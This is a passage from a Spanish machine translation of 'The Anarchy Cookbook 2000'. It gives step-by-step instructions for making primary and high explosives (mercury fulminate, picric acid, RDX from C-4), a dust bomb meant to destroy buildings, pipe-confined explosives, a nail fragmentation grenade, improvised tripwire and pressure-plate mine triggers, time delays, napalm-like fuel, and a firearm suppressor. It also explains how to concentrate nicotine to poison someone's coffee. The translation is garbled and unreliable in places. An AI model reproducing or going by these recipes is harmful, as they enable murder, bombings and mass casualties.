3. Calentar 10 cucharaditas de alcohol en un recipiente hasta que el alcohol se siente caliente al interior de la muñeca.

4. Verter la solución de metal-ácido en el alcohol caliente. La reacción debe comenzar en menos de 5 minutos. Densos humos blancos se desprende durante la reacción. Como los lapsos de tiempo, los gases se vuelven menos densos. Permitir 10 a 15 minutos para completar la reacción. Fulminato se depositan en el fondo.

• ATENCIÓN: Esta reacción genera grandes cantidades de vapores tóxicos, inflamables. El proceso debe llevarse a cabo al aire libre o en un área bien ventilada, lejos de chispas o llamas. No respirar los vapores!

5. Se filtra la solución a través de una toalla de papel en un recipiente. Cristales puede adherirse a un lado del contenedor. Si es así, la inclinación y agua chorro hacia abajo las paredes del recipiente hasta que todo el material se acumula en el papel de filtro.

6. Lavar los cristales con 6 cucharadas de alcohol etílico.7. Permita que estos cristales fulminato de mercurio se seque al aire.

• PRECAUCIÓN: Manipule explosiva seca con mucho cuidado. No raspe ni lo manipule o menos! Mantener lejos de chispas o llamas. Almacene en un lugar fresco y seco.

Polvo 132.Improvised Negro por The Jolly Roger

Polvo negro se pueden preparar de una manera sencilla, segura. Se puede utilizar como chorreado o pólvora.

Materiales:• Nitrato de potasio, granulada, 3 tazas (3/4 de litro)• Carbón de leña, en polvo, 2 tazas• El azufre en polvo, ½ taza• El alcohol, 5 litros (2 - ½ litros) (whisky, alcohol, etc)• Agua, 3 tazas (3/4 de litro)• La fuente de calor• 2 - cubos cada galón 2 (7 - ½ litros) de capacidad, al menos uno de los cuales es

resistente al calor (metal, cerámica, etc)• Investigación de la ventana plana, por lo menos 1 pie (30 cm) cuadrado• Palo de madera grande• Tela, por lo menos 2 pies (60 cm) cuadrados

Procedimiento:1. Colocar alcohol en uno de los cubos.2. Lugar de nitrato de potasio, carbón vegetal y azufre en el cubo resistente al

calor. Añadir 1 taza de agua y mezcle bien con el palo de madera hasta que todos los ingredientes se disuelven.

3. Añadir el agua restante (2 tazas) a la mezcla. Coloque el cubo en una fuente de calor y revuelva hasta que las burbujas pequeñas se empiezan a formar.

• PRECAUCIÓN: No hierva la mezcla. Asegúrese de que toda la mezcla se mantiene húmeda. Si alguno está seco, como en los lados del molde, se puede encender!

4. Quite el recipiente del fuego y vierta la mezcla en el alcohol mientras se agita vigorosamente.

5. Deje la mezcla de alcohol reposar por 5 minutos. Cuele la mezcla a través de tela para obtener un polvo negro. Deseche el líquido. Envuelva tela alrededor de polvo negro y apretar para eliminar todo el exceso de líquido.

Page 182: 106652012 the Anarchy Cookbook 2000 Es

6. Coloque sobre el cucharón de cribado en seco. Coloque la cantidad viable de polvo húmedo en la pantalla y por el roce de granulado sólido a través de la pantalla. NOTA: Si aparecen partículas granuladas se peguen entre sí y cambiar de forma, el lote se recombinan todo de polvo y repita los pasos 5 y 6.

7. Spread granulada polvo negro sobre una superficie plana, seca, para que la capa de alrededor de ½ pulgada (1 - ¼ cm) se ha formado. Deje que se seque. El uso del radiador, o la luz solar directa. Esto se debe secar tan pronto como sea posible, preferiblemente en una hora. El más largo es el período de secado, menos eficaz que el polvo negro.

• PRECAUCIÓN: Retire del fuego TAN PRONTO COMO gránulos secos. Polvo negro ya está listo para usar.

Ácido 133.Nitric por The Jolly Roger

El ácido nítrico se utiliza en la preparación de muchos explosivos, mezclas incendiarias, y temporizadores de ácido retardo. Se pueden preparar por destilación una mezcla de nitrato de potasio y ácido sulfúrico concentrado.

Material necesario:• Nitrato de potasio (2 partes en volumen)• Ácido sulfúrico concentrado (1 parte por volumen)• 2 botellas o envases de cuello angosto CERAMIN (son preferibles)• Olla o sartén• La fuente de calor (leña, carbón o carbón)• Cinta (papel, máscaras, electricidad, papel celofán, pero NO!)• De papel o trapos

IMPORTANTE: Si el ácido sulfúrico se obtiene de una batería del vehículo de motor, se concentran hirviéndola HASTA humos blancos. NO inhalar los vapores.

NOTA: La cantidad de ácido nítrico producido es la misma que la cantidad de nitrato de potasio. Así, por dos cucharadas de ácido nítrico, utilizar 2 cucharadas de nitrato de potasio y 1 cucharada de ácido sulfúrico concentrado.

Fuente de nitrato de potasio:• En otras partes de este libro de cocina • Las farmacias

Fuente de ácido sulfúrico concentrado:• Baterías de los vehículos de motor • Las plantas industriales

Procedimiento:1. Coloque el nitrato de potasio en seco en una botella o jarra. Añadir ácido

sulfúrico. No llene la botella de más de ¼ de su totalidad. Mezclar hasta que la pasta se forma.

• PRECAUCIÓN: No inhalar los humos!

2. Envuelva en papel o trapos alrededor de los cuellos de dos botellas. segura los cuellos de cinta de dos botellas juntos. Asegurarse de que las botellas queden a ras contra la otra y que no existen espacios de aire.

3. Apoyo a las botellas o latas en las rocas, para que la botella vacía es ligeramente inferior a la botella que contiene pasta de modo que el ácido nítrico que se forma en la recepción de la botella no se ejecutará en otra botella.

4. Construir el fuego en una olla o sartén.5. Calentar suavemente la botella que contiene la mezcla moviendo suavemente el fuego

dentro y fuera. Como humos rojos comienzan a aparecer periódicamente verter agua fría sobre botellas vacías de recepción. El ácido nítrico se empiezan a formar en la recepción de la botella.

Page 183: 106652012 the Anarchy Cookbook 2000 Es

• PRECAUCIÓN: No sobrecalentamiento o una botella con agua que contiene la mezcla que se puede quebrar. Como precaución adicional, una botella lugar que se calienta en un recipiente resistente al calor lleno de arena o grava. Calentar este recipiente exterior para producir ácido nítrico.

6. Continúa el proceso anterior hasta que no haya más humo rojos se forman. Si el ácido nítrico formado en la botella de recepción no está claro (nubes) se vierte en una botella limpia y repita los pasos 2-6.

• ATENCION: El ácido nítrico se debe mantener alejado de todos los combustibles y debe mantenerse en una cerámica sellados o recipiente de vidrio. No respirar los vapores!

134.Dust Instrucciones Bomb de The Jolly Roger

Un iniciador que iniciará material común para producir explosiones de polvo puede ser rápida y fácilmente construido. Este tipo de carga es ideal para la destrucción de áreas cerradas tales como habitaciones o edificios.

Material necesario:• Un plano puede, de 3 pulgadas (8 cm) de diámetro y 1 ½ pulgadas (3-3/4 cm) de alto.

A 6 - ½ onza de atún pueden sirve al propósito bastante bien.• Detonador• Explosivo• El aluminio (puede ser de alambre, hoja cortada, aplanada puede, o en polvo)• Clavo grande, 4 pulgadas (10 cm) de largo• Varilla de madera - ¼ de pulgada (6 mm) de diámetro• Harina, la gasolina y el polvo de aluminio o desbastada

NOTA: plástico explosivo de producir mejores explosiones que los explosivos del elenco.

Procedimiento:1. Uso de la uña, pulse un agujero a través del lateral de la lata de atún 3/8 pulgada

a media pulgada (1 a 1 - ½ cm) desde la parte inferior. Usando una acción de rotación y la palanca, agrandar el agujero hasta que se tendrá en cuenta el detonador.

2. Colocar la varilla de madera en el agujero y la posición del extremo de la varilla en el centro de la lata.

3. Presione explosivo en la lata, asegurándose para rodear la varilla, hasta que es 3/4 pulgada (2 cm) desde la parte superior de la lata. Retire con cuidado la varilla de madera.

4. Coloque el metal de aluminio en la parte superior del explosivo.5. Justo antes de su uso, inserte el detonador en la cavidad hecha por la varilla. El

iniciador está ahora listo para usar.

NOTA: Si se desea llevar el iniciador a cierta distancia, cartón puedeser presionado en la parte superior del aluminio para asegurarse contra la pérdida de material.

Instrucciones de uso:Esta unidad en particular funciona bastante bien para activar cargas de cinco libras de harina, ½ galón (1-2/3 litros) de gasolina, o dos libras de aluminio en escamas pintores. Los materiales sólidos simplemente puede estar contenida en sacos o en cajas de cartón. La gasolina puede ser colocado en cajas de cartón recubiertos de plástico de papel de la leche, así como botellas de plástico o de vidrio. Las cargas se colocan directamente en la parte superior del iniciador y el detonador es accionado eléctricamente o por un fusible según el tipo de tapa empleada. este va a destruir un recinto de 2.000 pies cúbicos (edificio de 10 x 20 x 10 pies).

Page 184: 106652012 the Anarchy Cookbook 2000 Es

Nota: Para los recintos más grandes, use iniciadores proporcionalmente mayores y cargos.

135.Carbon-Tet explosivos por parte de Jolly Roger

Una mezcla explosiva húmedo puede ser hecha de polvo fino de aluminio combinado con tetracloruro de carbono o tetracloroetileno. Este explosivo puede ser detonada con un detonador.

Material necesario:• De aluminio fino polvo bronceador• Tetracloruro de carbono o el tetracloroetileno• La agitación de la varilla (de madera)• Recipiente de mezclado (plato, cuchara, etc)• Recipiente de medida (taza, cuchara, etc)• Los recipientes de almacenamiento (tarro, lata, etc)• Detonador• Pipe, lata o frasco

Fuente de tetracloruro de carbono:• Pintura de la tienda• Farmacia• Extintor de incendios de fluido

Fuente de tetracloroetileno:• Limpieza en seco• Farmacia

Procedimiento:1. Medir dos partes de aluminio en polvo a una parte o tetracloruro de carbono líquido

en el recipiente de mezcla tetracloroetileno, la adición de líquido a polvo mientras se agita con la varilla de madera.

2. Revuelva hasta que la mezcla se convierte en la consistencia de un jarabe de miel.

• PRECAUCIÓN: Los vapores del líquido es peligroso y no debe ser inhalado.

3. Almacenar explosivos en un frasco o recipiente similar a prueba de agua hasta que esté listo para su uso. El líquido en la mezcla se evapora rápidamente cuando no confinado.

NOTA: Mezcla detonará de esta manera durante un período de 72 horas.

Instrucciones de uso:1. Vierta esta mezcla en un tubo de hierro o de acero que tiene una tapa de rosca en

un extremo. Si un tubo no está disponible, puede utilizar una lata seca lata o frasco de vidrio.

2. Insertar detonador justo debajo de la superficie de la mezcla explosiva.

NOTA: Confinar el extremo abierto del recipiente se sumará a la eficacia del explosivo.

136.Making ácido pícrico de la aspirina por The Jolly Roger

Ácido pícrico puede ser utilizado como un explosivo de refuerzo en los detonadores, una carga explosiva de alto, o como un intermedio para la preparación de pícrico plomo.

Material necesario:• Las tabletas de aspirina (5 granos por comprimido)• El alcohol, 95% puro

Page 185: 106652012 the Anarchy Cookbook 2000 Es

• El ácido sulfúrico, concentrado, (si el ácido de batería, hierva hasta que se desprendan humos blancos desaparecen)

• Nitrato de potasio (ver otra parte de este libro de cocina)• Agua• Las toallas de papel• Frasco de conservas, 1 pinta• Rod (de vidrio o de madera)• Los envases de vidrio• Cerámica o plato de vidrio• Copa• Cucharadita• Cucharada• Pan• La fuente de calor• Cinta

Procedimiento:1. Crush 20 tabletas de aspirina en un recipiente de vidrio. Añadir una cucharadita de

agua y el trabajo en una pasta.2. Añadir aproximadamente 1/3 a ½ taza de alcohol (100 ml) a la pasta de la aspirina y

revuelva mientras lo vierte.3. Filtrar la solución de alcohol-aspirina a través de una toalla de papel a otro

recipiente de vidrio. Eliminar la izquierda sólida en la toalla de papel.4. Verter la solución filtrada en un vaso o plato de cerámica.5. Se evapora el alcohol y el agua de la solución mediante la colocación de la cápsula

en un recipiente con agua caliente. Polvo blanco permanecerá en el plato después de la evaporación.

• NOTA: El agua en el recipiente debe estar a la temperatura del baño caliente, no hirviendo, a unos 160 ° F a 180 ° F. No se debe quemar las manos.

6. Vierta 1/3 taza (80 mililitros) de ácido sulfúrico concentrado en un frasco de conservas. Añadir el polvo blanco en el ácido sulfúrico.

7. Jar calor enlatado de ácido sulfúrico en una sartén a fuego lento de baño de agua caliente durante 15 minutos y luego quitar el vaso del baño. Solución a su vez, a un color amarillo-naranja.

8. Añadir 3 cucharaditas de nivel (15 gramos) de nitrato de potasio en tres porciones a la solución de color amarillo-naranja; agitar vigorosamente durante las adiciones. Solución se vuelve rojo, luego de vuelta a un color amarillo-naranja.

9. Dejar que la solución se enfríe a temperatura ambiente mientras se agitaba ocasionalmente.

10. Verter lentamente la solución, mientras se agita, en 1 - ¼ de taza (300 mililitros) de agua fría y deje que se enfríe.

11. Se filtra la solución a través de una toalla de papel en un recipiente de vidrio. Luz partículas amarillas se acumulan en la toalla de papel.

12. Lávese las partículas de luz de color amarillo con 2 cucharadas (25 ml) de agua. Desechar el líquido residual en el recipiente.

13. Artículos colocar en un molde de cerámica y el conjunto en un baño de agua caliente, como en el paso 5, durante 2 horas.

137.Reclamation de RDX de explosivos C-4 por la Jolly Roger

RDX puede ser obtenido a partir de explosivos C-4 con el uso de gasolina. Se puede utilizar como un explosivo de refuerzo para detonadores o como una carga explosiva de alto.

Material necesario:• Gasolina• Explosivo C-4

Page 186: 106652012 the Anarchy Cookbook 2000 Es

• 2 - tarros de la pinta de vidrio de cuello ancho• Las toallas de papel• Varilla de Agitación (de vidrio o de madera)• Agua• Cerámica o plato de vidrio• Pan• La fuente de calor• Cucharadita• Copa• Cinta

NOTA: El agua, de cerámica o una placa de vidrio, pan, y una fuente de calor son opcionales. El RDX puede ser secado al aire en su lugar.

Procedimiento:1. Coloque 1 - ½ cucharaditas (15 gramos) de explosivo C-4 en uno de los tarros de la

pinta. Agregar 1 taza (240 mililitros) de gasolina.

• NOTA: Estas cantidades se puede aumentar para obtener más RDX. Por ejemplo, use 2 galones de gasolina por 1 taza de C-4.

2. Amasar y mezclar el C-4 con la vara hasta que el C-4 se ha roto en pequeñas partículas. Deje que la mezcla en reposo durante media hora.

3. Se agita la mezcla de nuevo hasta un fino polvo blanco permanece en el fondo del frasco.

4. La mezcla se filtra a través de una toalla de papel en el frasco de vidrio otros. Lávese las partículas recogidas en la toalla de papel con ½ taza (120 mililitros) de gasolina. Deseche el líquido residual.

5. Coloque las partículas de RDX en un vaso o un plato de cerámica. Ajuste la antena en una olla con agua caliente, no hirviendo y seco durante un periodo de 1 hora.

• NOTA: Las partículas de RDX puede secar al aire durante un período de 2 a 3 horas.

138.Egg combustibles a base de llama gela por la Jolly Roger

El blanco de cualquier huevo de ave se puede utilizar para gasolina gel para uso como combustible de llama que se adhieren a las superficies de destino.

Materiales necesarios:

Partes en volumen Ingrediente ¿Cómo se utiliza Fuente Común85 Gasolina Motor de combustible

Gasolineras Estufa de combustible

Automóvil Solvente

14 Claras de huevo Comida Almacene los alimentos Industrial Granjas Procesos

Cualquiera de los siguientes:

1 Sal de mesa Comida Agua de Mar Industrial Las salmueras naturales Procesos Almacene los alimentos

Page 187: 106652012 the Anarchy Cookbook 2000 Es

3 Café molido Comida Planta de café Almacene los alimentos

3 Té de hojas secas Comida Té Planta Almacene los alimentos

3 Cacao Comida Árbol de cacao Almacene los alimentos

2 Azúcar Edulcoración Caña de Azúcar Alimentos Almacene los alimentos

1 Salitre Pirotécnica Natural(Nitrato de potasio) Explosivos Depósitos

Cerillas Drug Store Medicina

1 Sales de Epsom Medicina Natural Agua mineral Kisserite Industrial Drug Store Procesos Almacene los alimentos

2 La sosa Lavado limpiador Almacene los alimentos

(Sal Soda) Medicina Drug Store Fotografía Foto de suministro Almacenar

1 ½ Bicarbonato de sosa Cocción Almacene los alimentos Bebidas Drug Store Medicamentos Aguas Minerales

1 ½ Aspirina Medicina Drug Store Almacene los alimentos

Procedimiento:PRECAUCIÓN: Asegúrese de que no hay llamas en el área de la hora de mezclar los combustibles de la llama! NO FUMAR!

1. Separar la clara de huevo de la yema. Esto puede hacerse al romper el huevo en un plato y cuidadosamente retirar la yema de huevo con una cuchara.

2. Verter la clara de huevo en un recipiente, botella, u otro recipiente y agregue la gasolina.

3. Añadir la sal (u otro aditivo) a la mezcla y revuelva ocasionalmente hasta que forma un gel (de 5 a 10 minutos).

NOTA: Un combustible más grueso llama gel se puede obtener poniendo el frasco con tapa en caliente (65 ° C) durante aproximadamente una hora y media y luego dejar que se enfríen a temperatura ambiente. (NO CALIENTE EL CAFÉ QUE CONTIENE combustible gelificado!)

139.Clothespin interruptor de la Jolly Roger

Page 188: 106652012 the Anarchy Cookbook 2000 Es

Una pinza de ropa tipo de resorte se utiliza para hacer un interruptor de cierre de circuito para activar cargas explosivas, minas, armas trampa y sistemas de alarma.

Material necesario:• Primavera tipo de pinza de la ropa• Alambre de cobre vendida - 1/16 pulg (2 mm) de diámetro• Cadena de fuerte en el alambre• Pieza plana de madera (aproximadamente 1/8 x 1 "x 2")• Cuchillo

Procedimiento:1. Franja de cuatro pulgadas (10 cm) de aislamiento de los extremos de los 2 hilos de

cobre sólido. Raspe los cables de cobre con un cuchillo de bolsillo hasta que el metal es brillante.

2. El viento un raspado cable firmemente en la mandíbula de la pinza de ropa, y el otro cable en la otra mordaza.

3. Hacer un agujero en un extremo de la pieza plana de madera con un cuchillo, clavo caliente o taladro.

4. Ate cuerda fuerte o alambre a través del agujero.5. Coloque pieza plana de madera entre las mandíbulas de la pinza de la ropa

interruptor.

Circuito de disparo básica: ______________ | | --------------------------- \ | Iniciador | ---------- \ | fuerte -------------- | | Cuerda | | \ | _ --------- _________ | --------- | | \ Pinza de la ropa \ / \ / Interruptor \ / \ / \ / + - ---------- | | | Baterías | ----------

Cuando la pieza plana de madera se retira tirando de la cuerda, las mordazas de la pinza de ropa se cerrará, completando el circuito.

PRECAUCIÓN: No conecte la batería hasta que el interruptor y el cable de viaje se han colocado y se examina. Asegúrese de que la pieza plana de madera que separa las mandíbulas del interruptor.

140.Flexible Cambiar placa por el Jolly Roger

Este interruptor de placa flexible se utiliza para el inicio de minas sembradas y explosivos.

Material necesario:• Dos láminas metálicas flexibles:

• Uno de aproximadamente 10 pulgadas (25 cm) cuadrado• Uno de aproximadamente 10 pulgadas x 8 pulgadas (20 cm)

• Pieza de madera de 10 pulgadas cuadradas x 1 mm de espesor• Cuatro bloques de madera blanda 1 pulgada x 1 pulgada x ¼ de pulgada

Page 189: 106652012 the Anarchy Cookbook 2000 Es

• Ocho clavos de cabeza plana de 1 pulgada de largo• Conexión de los cables• Cinta adhesiva

Procedimiento:1. Uñas 10 pulgadas por 8 pulgadas de chapa metálica a 10 pulgadas pieza cuadrada de

madera de modo que 1 mm de madera muestra a cada lado del metal. Deja uno de los clavos que sobresalen alrededor de ¼ pulgadas

2. Pele aislamiento del extremo de un cable de conexión. Envuelva este fin alrededor de la uña y el clavo, pues de lo

3. Coloque los cuatro bloques de madera en las esquinas de la base de madera.4. Coloque la hoja de 10 pulgadas cuadradas de metal flexible, de modo que se apoye en

los bloques de acuerdo con la base de madera.5. Conduzca cuatro clavos a través de la hoja de metal y los bloques (uno por bloque)

para sujetar la hoja a la base de madera. Un segundo cable de conexión está conectado a uno de los clavos como en el paso # 2.

6. Envuelva la cinta adhesiva alrededor de los bordes de la placa y la base de madera. Esto asegurará que no haya suciedad u otros materiales extraños obtendrá entre las placas y evitar que el interruptor de funcionamiento.

Modo de empleo:El interruptor se coloca en un agujero en el camino de tráfico previsto y se cubre con una fina capa de suciedad o material de camuflaje otro. El artefacto explosivo mina u otro conectado al switch puede ser enterrado con el interruptor o emplazados en otras partes como se desee.

Cuando un vehículo pasa sobre el interruptor, las dos placas de metal hacen contacto cerrando el circuito de disparo.

Sistemas de firma 141.Low (silencioso) de The Jolly Roger

Los sistemas de baja de la firma (silenciadores) de armas improvisadas armas pequeñas se pueden hacer de tubo de acero de gas o de agua y accesorios.

Material necesario:• Contenedor de Granada• Tubo de acero pezón, 6 pulgadas (15 cm) de largo - (véase el cuadro 1 para el

diámetro)• 2 acoplamientos de tubos de acero - (ver tabla 2 para las dimensiones)• Tela de algodón - (ver tabla 2)• Perforar• Algodón hidrófilo

Procedimiento:1. Taladre un agujero en el recipiente granadas en ambos extremos para encajar

diámetro exterior del niple. (Ver tabla 1)

-> / ---------------------- \ / | |2,75 en |) (<-agujeros de diámetro. \ | | -> \ ----------------------- /

| ----------------------- | 5 pulg

2. Taladre cuatro hileras de agujeros en el pezón de la tubería. Utilice la tabla 1 para el diámetro y ubicación de los agujeros.

(Nota: ¡soy muy malo en el arte ASCII)

6 pulgadas

Page 190: 106652012 the Anarchy Cookbook 2000 Es

| ----------------------------------- | ________________________________________ | OOOOOOOOOOOOOOOOO | | C (nominal de diámetro.) ------------------------------------- (Tamaño del agujero) | \ / (espacio entre los dos) B (diámetro) Un

3. Tema uno de los acoplamientos de tuberías en el niple de tubo perforado.4. Cortar la longitud de acoplamiento para permitir barril de arma para por completo

en este sistema de firma bajo. Barril debe tope contra el extremo del niple de tubo perforado.

5. Separar la mitad superior del recipiente granada de la mitad inferior.6. Insertar el niple en el agujero perforado en la base de la mitad inferior del

recipiente. Embale el algodón absorbente en el interior del recipiente y alrededor del pezón de la tubería.

7. Embale el algodón absorbente en la mitad superior del orificio de contenedores granadas dejando en el centro. Montar el recipiente a la mitad inferior.

8. Enrosque el acople otra en el niple de la tubería.

Nota: Un contenedor más largo y niple de tubería, con los mismos "A" y "B" las dimensiones como los que figuran, reducirá aún más la firma del sistema.

Modo de empleo:

1. Pase el sistema de firma bajo en el arma seleccionada de forma segura.2. Coloque el tamaño de algodón acolchado adecuado en el extremo de la boca del

sistema (ver tabla 2)3. De carga de armas4. Armas ya está listo para su uso

TABLA 1Dimensiones del sistema bajo la firma

Enganche Huecos por 4 filas A B C D Fila Total.45 Cal 3/8in ¼ 3/8in 3/8in 12 48.38 Cal 3/8in ¼ ¼ ¼ 12 489 mm 3/8in ¼ ¼ ¼ 12 487,62 mm 3/8in ¼ ¼ ¼ 12 48.22 Cal ¼ 5/32in 1/8 * en 1/8in 14 50 * Tubo Extra Pesada

TABLA 2Tamaños de algodón Guata

Arma Guata de algodón de tamaño.45 Cal 1 - ½ x 6 pulgadas.38 Cal 1 x 4 pulgadas9 mm 1 x 4 pulgadas7,62 mm 1 x 4 pulgadas.22 Cal No es necesario

142.Delay ignición de un cigarrillo en la Jolly Roger

Un sencillo y económico (cada uno desea guardar haha dinero) retardo de tiempo se puede hacer con un cigarrillo común.

Materiales necesarios:• Cigarrillo• Papel partido• String (cordones de los zapatos o en la médula similar)• Cordón de mecha (improvisada o comercial)

Page 191: 106652012 the Anarchy Cookbook 2000 Es

Procedimiento:1. Corte el extremo del cordón de mecha en una inclinación para exponer el núcleo

interno2. Cigarrillo de luz en forma normal. Colocar un partido de papel de modo que el había

se expone más extremo del cable de fusible y atar tanto a un lado de la quema de cigarrillos con una cuerda.

3. Coloque el cigarrillo encendido con el fusible para que arda libremente. Un método sugerido es para colgar el retraso en una ramita.

Nota: los cigarrillos comunes secos quemar cerca de 1 pulgada cada 7 u 8 minutos en el aire quieto. (Ahora estoy hablando de todos, excepto las marcas estadounidenses, que queman alrededor de 1 pulgada cada 4-5 minutos) Si el cordón de mecha es el lugar de una pulgada del extremo encendido del cigarrillo un retardo de tiempo de 7 u 8 minutos se traducirá.

El tiempo de retardo puede variar dependiendo del tipo de cigarrillo, el viento, la humedad y otras condiciones atmosféricas, de conocer a su cigarrillo!) Para obtener el tiempo de retardo exacto, una ejecución de prueba debe hacerse bajo condiciones de "uso".

143.Nicotine por The Jolly Roger

La nicotina es un veneno abundante. Fácil de encontrar en los productos del tabaco, en forma concentrada unas gotas puede matar rápidamente a alguien. Aquí está cómo se concentran:

En primer lugar obtener una lata de tabaco de mascar o tabaco de pipa. Retire el contenido y el remojo en agua durante la noche en un frasco (aproximadamente 2/3 taza de agua va a hacer ...). Por la mañana, se cuela en otro recipiente de la mezcla a través de una toalla porosa. Luego, enrolle la toalla alrededor de la bola de tabaco y apretar hasta que todo el líquido se encuentra en el frasco. Tire a la basura el tabaco - que no lo necesita más.

Ahora tienes dos opciones. Recomiendo el primero. Esto hace que la nicotina más potente.

1. Permitir que se evapore hasta que se obtiene el jarabe pegajoso en el frasco. Esta es la nicotina casi puro (el infierno, es lo suficientemente puro como para seguro!).

2. Calienta a fuego lento hasta que el agua se evapora y se produce un espesor de jarabe pegajoso (no sé cuánto tiempo se tarda ... no debería tomar mucho tiempo, sin embargo.).

Ahora todo lo que tiene que hacer, cuando se desea utilizarlo, es poner unas gotas en un gotero o equivalente, y caer unos 4 o 5 gotas en el café de la víctima. El café es recomendable, ya que va a disimular el sabor. Dado que la nicotina es una droga, la víctima debe recibir un zumbido bastante antes de cumplir sus dedos de los pies hasta las margaritas, por así decirlo.

Nota: Si el jarabe es demasiado pegajosa, que se diluye con unas gotas de agua. Y mientras usted está en él, mejor añadir una gota extra para el café sólo para estar seguro!

Temporizador de semillas 144.Dried por The Jolly Roger

Un dispositivo de retardo de tiempo para los circuitos eléctricos de cocción se pueden hacer usando el principio de la expansión de las semillas secas.

Material necesario:• Los guisantes secos, frijoles, semillas u otros deshidratados• De boca ancha frasco de vidrio con tapa no metálica• Dos tornillos o pernos

Page 192: 106652012 the Anarchy Cookbook 2000 Es

• Placa metálica delgada• Taladro de mano• Destornillador

Procedimiento:1. Determinar la tasa de la subida de las semillas secas seleccionadas. Esto es

necesario para determinar el tiempo de retardo del temporizador.• Coloque una muestra de las semillas secas en el frasco y cubrir con agua.• Se mide el tiempo que toma para que las semillas a subir una altura dada. La

mayoría de las semillas secas aumentar 50% en una a dos horas.2. Cortar un disco de la placa de metal fino. Disco deben entrar holgadamente dentro

del tarro.

NOTA: Si es de metal pintado, oxidado, o revestidos de otro modo, se debe raspar o lijar para obtener una superficie limpia del metal

3. Haga dos agujeros en la tapa de la jarra de aproximadamente 2 pulgadas de distancia. Diámetro de los agujeros deben ser tales que los tornillos o pernos se enroscará firmemente en ellas. Si el frasco tiene una tapa metálica o tapa no, un trozo de madera o de plástico (no metal) puede ser utilizado como una tapa.

4. Girar los dos tornillos o pernos a través de los orificios de la tapa. Los pernos deben extenderse alrededor de una pulgada (2 ½ cm) dentro del frasco.

IMPORTANTE: Los dos pernos se debe extender a la misma distancia por debajo de la tapa del recipiente.

5. Verter semillas secas en el recipiente. El nivel dependerá del tiempo de subida medido previamente y el retraso deseado.

6. Coloque el disco metálico en el frasco en la parte superior de las semillas.

Modo de empleo:1. Agregar suficiente agua para cubrir completamente las semillas y coloque la tapa en

el frasco.2. Conecte los cables de conexión del circuito de disparo de los dos tornillos de la

tapa.

La expansión de las semillas aumentará el disco de metal hasta que haga contacto con los tornillos y se cierra el circuito.

145.Nail Granada por The Jolly Roger

Granadas de fragmentación eficaces se pueden hacer de un bloque de TNT o explosivo para voladuras otro y las uñas.

Material necesario:• Bloque de TNT o explosivos para voladuras otra• Uñas• No eléctrico (militar o improvisado) detonador• Fusible del cable• Cinta, cuerda, alambre, o pegamento

Procedimiento:1. Si una carga explosiva que no sea un bloque estándar de TNT se utiliza, hacer un

agujero en el centro de la carga para la inserción del detonador. TNT se puede perforar con relativa seguridad. Con explosivos plásticos, un agujero se puede realizar pulsando un palo redondo en el centro de la carga. El agujero debe ser lo suficientemente profunda de que el detonador está totalmente dentro de los explosivos.

2. Cinta, lazo, o cola de uno o dos hileras de clavos muy juntos a los lados del bloque de explosivos. Nails debe cubrir completamente las cuatro superficies del bloque.

Page 193: 106652012 the Anarchy Cookbook 2000 Es

3. Colocar chorreado tapón en un extremo del cable de fusible y engarce con unos alicates.

NOTA: Para saber el tiempo que el cordón de mecha debe ser, comprobar el tiempo que tarda una longitud conocida para quemar. Si 12 pulgadas (30 cm) se quema durante 30 segundos, un retardo de 10 segundos requerirá una de 4 pulgadas (10 cm) se fusionan.

4. Insertar el detonador en el agujero en el bloque de explosivo. Cinta o lazo cordón de mecha en su lugar para que no se caiga cuando la granada se lanza.

Uso alternativo:Una eficaz direccional mina antipersonal puede hacerse mediante la colocación de clavos en sólo un lado del bloque de explosivo. Para el caso, y detonador eléctrico puede ser utilizado.

146.The Glosario de Bell por The Jolly Roger

ACD: Distribuidor automático de llamadas - Un sistema que distribuye automáticamente las llamadas a las piscinas del operador (la prestación de servicios tales como la intercepción y asistencia de directorio), para los vendedores de billetes de avión, etc

Administración: Las tareas de mantenimiento de registros, el seguimiento, la reordenación, la predicción de la necesidad de crecimiento, etc

SIA: Sistema de Intercepción automático - Un sistema que emplea una unidad de audio-respuesta bajo el control de un procesador para proporcionar automáticamente información pertinente a las llamadas dirigidas a interceptar.

Alerta: Para indicar la existencia de una llamada entrante, (timbre).

ANI: identificación automática de números - a menudo pronunciado "Annie", una instalación para identificar automáticamente el número de la persona que llama para la carga de los propósitos.

Apariencia: Una conexión a un terminal de red, como en "la línea tiene dos apariciones en la red."

Asiste: La operación de seguimiento de una línea o un tronco de entrada para descolgar o la incautación, respectivamente.

Audible: La tenue "imagen" del timbre que transmite a la persona que llama durante eltimbre, no se deriva de la señal de llamada real en los sistemas posteriores.

Ruta troncal: La ruta compuesta por troncos del último grupo entre las oficinas de finales en las diferentes áreas del centro regional.

BHC: Las llamadas hora pico - El número de llamadas realizadas durante la hora punta.

Bloqueo: La proporción de éxito a los intentos de utilizar un total de instalación; expresa como una probabilidad cuando se calcula una prioridad.

El bloqueo de la red: Una red que, bajo ciertas condiciones, puede ser incapaz de formar un camino de transmisión de un extremo de la red a la otra. En general, todas las redes utilizadas dentro de los Sistemas Bell son del tipo de bloqueo.

Caja Azul: El equipo utilizado de manera fraudulenta para sintetizar las señales, el acceso a la red de peaje para la colocación de las llamadas sin cargo.

BORSCHT Circuito: Un nombre para el circuito de la línea en la oficina central. No funciona como una tecla de acceso para las funciones que deben ser realizadas por el

Page 194: 106652012 the Anarchy Cookbook 2000 Es

circuito: la batería, timbre de sobretensión, supervisión, codificación, híbrido, y pruebas.

Busy Signal: (Llamado-línea ocupada) Una señal acústica que, en el Sistema Bell, cuenta con 480Hz y 620hz interrumpido en 60IPM.

Bylink: Un especial de alta velocidad los medios utilizados en equipos de palo para el encaminamiento de las llamadas entrantes de la oficina de paso a paso. Los troncos de esas oficinas se refiere a menudo como "troncos" bylink aun cuando de entrada a las oficinas noncrossbar; ". Troncos dc entrantes" son más bien conocidos como Tales medios de alta velocidad son necesarias para asegurar que el impulso de entrada primero no se pierde.

Cable Vault: El punto que el cable de teléfono entra en el edificio de la Oficina Central.

CAMA: Contabilidad centralizada automática de mensajes - Declarado como Alabama.

CCIS: canal común de señalización entre oficinas - la información de señalización para las conexiones troncales través de un enlace por separado, los datos nonspeech más bien que sobre los propios troncos.

CCITT: Telegráfico Internacional y el Comité Consultivo de teléfono-un comité internacional que formula planes y establece normas relativas a los medios de comunicación internacionales.

CDO: Oficina Comunitaria de Dial - Una pequeña oficina por lo general las zonas rurales por lo general servida por el equipo paso a paso.

CO: Oficina Central - Comprende una red de conmutación y su equipo de control y apoyo. De vez en cuando no se utiliza correctamente el significado de "código de la oficina."

